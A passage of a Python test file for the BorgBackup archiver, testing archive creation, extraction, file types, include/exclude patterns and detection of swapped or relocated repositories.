with open(self.patterns_file_path, 'wb') as fd:
fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
self._old_wd = os.getcwd()
os.chdir(self.tmpdir)
def tearDown(self):
os.chdir(self._old_wd)
# note: ignore_errors=True as workaround for issue #862
shutil.rmtree(self.tmpdir, ignore_errors=True)
setup_logging()
def cmd(self, *args, **kw):
exit_code = kw.pop('exit_code', 0)
fork = kw.pop('fork', None)
if fork is None:
fork = self.FORK_DEFAULT
ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
if ret != exit_code:
print(output)
self.assert_equal(ret, exit_code)
return output
def create_src_archive(self, name):
self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
def open_archive(self, name):
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, name)
return archive, repository
def open_repository(self):
return Repository(self.repository_path, exclusive=True)
def create_regular_file(self, name, size=0, contents=None):
assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
filename = os.path.join(self.input_path, name)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
with open(filename, 'wb') as fd:
if contents is None:
contents = b'X' * size
fd.write(contents)
def create_test_files(self):
"""Create a minimal test case including all supported file types
"""
# File
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('flagfile', size=1024)
# Directory
self.create_regular_file('dir2/file2', size=1024 * 80)
# File mode
os.chmod('input/file1', 0o4755)
# Hard link
if are_hardlinks_supported():
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'hardlink'))
# Symlink
if are_symlinks_supported():
os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
self.create_regular_file('fusexattr', size=1)
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
# ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
# will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
# This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
# into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
# (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
xattr.setxattr(fn, b'user.foo', b'bar')
xattr.setxattr(fn, b'user.empty', b'')
# XXX this always fails for me
# ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
# same for newer ubuntu and centos.
# if this is supported just on specific platform, platform should be checked first,
# so that the test setup for all tests using it does not fail here always for others.
# xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
# FIFO node
if are_fifos_supported():
os.mkfifo(os.path.join(self.input_path, 'fifo1'))
if has_lchflags:
platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
try:
# Block device
os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
# Char device
os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
# File mode
os.chmod('input/dir2', 0o555) # if we take away write perms, we need root to remove contents
# File owner
os.chown('input/file1', 100, 200) # raises OSError invalid argument on cygwin
have_root = True # we have (fake)root
except PermissionError:
have_root = False
except OSError as e:
# Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
if e.errno not in (errno.EINVAL, errno.ENOSYS):
raise
have_root = False
time.sleep(1) # "empty" must have newer timestamp than other files
self.create_regular_file('empty', size=0)
return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
have_root = self.create_test_files()
# fork required to test show-rc output
output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
self.assert_in('borgbackup version', output)
self.assert_in('terminating with success status, rc 0', output)
self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
self.assert_in('Archive name: test.2', output)
self.assert_in('This archive: ', output)
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
list_output = self.cmd('list', '--short', self.repository_location)
self.assert_in('test', list_output)
self.assert_in('test.2', list_output)
expected = [
'input',
'input/bdev',
'input/cdev',
'input/dir2',
'input/dir2/file2',
'input/empty',
'input/file1',
'input/flagfile',
]
if are_fifos_supported():
expected.append('input/fifo1')
if are_symlinks_supported():
expected.append('input/link1')
if are_hardlinks_supported():
expected.append('input/hardlink')
if not have_root:
# we could not create these device files without (fake)root
expected.remove('input/bdev')
expected.remove('input/cdev')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
expected.remove('input/flagfile') # this file is UF_NODUMP
os.remove(os.path.join('input', 'flagfile'))
list_output = self.cmd('list', '--short', self.repository_location + '::test')
for name in expected:
self.assert_in(name, list_output)
self.assert_dirs_equal('input', 'output/input')
info_output = self.cmd('info', self.repository_location + '::test')
item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
self.assert_in('Number of files: %d' % item_count, info_output)
shutil.rmtree(self.cache_path)
info_output2 = self.cmd('info', self.repository_location + '::test')
def filter(output):
# filter for interesting "info" output, ignore cache rebuilding related stuff
prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
'All archives:', 'Chunk index:', ]
result = []
for line in output.splitlines():
for prefix in prefixes:
if line.startswith(prefix):
result.append(line)
return '\n'.join(result)
# the interesting parts of info_output2 and info_output should be same
self.assert_equal(filter(info_output), filter(info_output2))
def test_init_parent_dirs(self):
parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
repository_path = os.path.join(parent_path, 'repository')
repository_location = self.prefix + repository_path
with pytest.raises(Repository.ParentPathDoesNotExist):
# normal borg init does NOT create missing parent dirs
self.cmd('init', '--encryption=none', repository_location)
# but if told so, it does:
self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
assert os.path.exists(parent_path)
def test_unix_socket(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(os.path.join(self.input_path, 'unix-socket'))
except PermissionError as err:
if err.errno == errno.EPERM:
pytest.skip('unix sockets disabled or not supported')
elif err.errno == errno.EACCES:
pytest.skip('permission denied to create unix sockets')
self.cmd('create', self.repository_location + '::test', 'input')
sock.close()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
with open(os.open(some_file, flags_noatime)) as file:
file.read()
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.create_test_files()
atime, mtime = 123456780, 234567890
have_noatime = has_noatime('input/file1')
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
if have_noatime:
assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
else:
# it touched the input file's atime while backing it up
assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
assert int(sto.st_birthtime * 1e9) == mtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
def test_sparse_file(self):
def is_sparse(fn, total_size, hole_size):
st = os.stat(fn)
assert st.st_size == total_size
sparse = True
if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
sparse = False
if sparse and hasattr(os, 'SEEK_HOLE') and hasattr(os, 'SEEK_DATA'):
with open(fn, 'rb') as fd:
# only check if the first hole is as expected, because the 2nd hole check
# is problematic on xfs due to its "dynamic speculative EOF preallocation
try:
if fd.seek(0, os.SEEK_HOLE) != 0:
sparse = False
if fd.seek(0, os.SEEK_DATA) != hole_size:
sparse = False
except OSError:
# OS/FS does not really support SEEK_HOLE/SEEK_DATA
sparse = False
return sparse
filename = os.path.join(self.input_path, 'sparse')
content = b'foobar'
hole_size = 5 * (1 << CHUNK_MAX_EXP) # 5 full chunker buffers
total_size = hole_size + len(content) + hole_size
with open(filename, 'wb') as fd:
# create a file that has a hole at the beginning and end (if the
# OS and filesystem supports sparse files)
fd.seek(hole_size, 1)
fd.write(content)
fd.seek(hole_size, 1)
pos = fd.tell()
fd.truncate(pos)
# we first check if we could create a sparse input file:
sparse_support = is_sparse(filename, total_size, hole_size)
if sparse_support:
# we could create a sparse input file, so creating a backup of it and
# extracting it again (as sparse) should also work:
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir(self.output_path):
self.cmd('extract', '--sparse', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
filename = os.path.join(self.output_path, 'input', 'sparse')
with open(filename, 'rb') as fd:
# check if file contents are as expected
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_equal(fd.read(len(content)), content)
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
def test_repository_swap_detection(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
self.cmd('delete', '--cache-only', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
# Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
self.create_test_files()
# User initializes her repository with her passphrase
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Attacker replaces it with her own repository, which is encrypted but has no passphrase set
shutil.rmtree(self.repository_path)
with environment_variable(BORG_PASSPHRASE=''):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Delete cache & security database, AKA switch to user perspective
self.cmd('delete', '--cache-only', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
shutil.rmtree(get_security_dir(repository_id))
with environment_variable(BORG_PASSPHRASE=None):
# This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
# is set, while it isn't. Previously this raised no warning,
# since the repository is, technically, encrypted.
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
os.rename(self.repository_path, self.repository_path + '_new')
with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location + '_new')
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location')) as fd:
location = fd.read()
assert location == Location(self.repository_location + '_new').canonical_path()
# Needs no confirmation anymore
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(security_dir)
self.cmd('info', self.repository_location + '_new')
for file in ('location', 'key-type', 'manifest-timestamp'):
assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location'), 'w') as fd:
fd.write('something outdated')
# This is fine, because the cache still has the correct information. security_dir and cache can disagree
# if older versions are used to confirm a renamed repository.
self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
self.cmd('init', '--encryption=none', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
# Ok: repository is known
self.cmd('info', self.repository_location)
# Ok: repository is still known (through security_dir)
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location)
# Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
shutil.rmtree(self.cache_path)
shutil.rmtree(security_dir)
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('info', self.repository_location)
with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location)
def test_strip_components(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
self.assert_true(not os.path.exists('file'))
with self.assert_creates_file('file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
with self.assert_creates_file('dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
with self.assert_creates_file('input/dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
@requires_hardlinks
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_mount_hardlinks(self):
self._extract_hardlinks_setup()
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# we need to get rid of permissions checking because fakeroot causes issues with it.
# On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
# On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
if sys.platform == 'darwin':
ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
else:
ignore_perms = ['-o', 'ignore_permissions']
with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
changedir(mountpoint):
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/dir1')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
def test_extract_include_exclude(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/file1', )
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
# Create with regular expression exclusion for file4
self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Extract with regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Combine --exclude with fnmatch and regular expression
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
shutil.rmtree('output/input')
# Combine --exclude-from and regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
'--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
self.cmd("init", '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
self.create_regular_file("file333", size=1024 * 80)
self.cmd("create", self.repository_location + "::test", "input")
# Extract everything with regular expression
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "re:.*")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
shutil.rmtree("output/input")
# Extract with pattern while also excluding files
with changedir("output"):
self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
shutil.rmtree("output/input")
# Combine --exclude with pattern for extraction
with changedir("output"):
self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
shutil.rmtree("output/input")
# Multiple pattern
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
def test_extract_progress(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test', '--progress')
assert 'Extracting:' in output
def _create_test_caches(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
contents=b'invalid signature')
os.mkdir('input/cache3')
os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
def test_create_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = b'\x00foo\n\nbar\n \n'
self.cmd('create', self.repository_location + '::test', '-', input=input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data)
assert item['path'] == 'stdin'
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
assert extracted_data == input_data
def test_create_without_root(self):
"""test create without a root"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
"""test create with only a root pattern"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
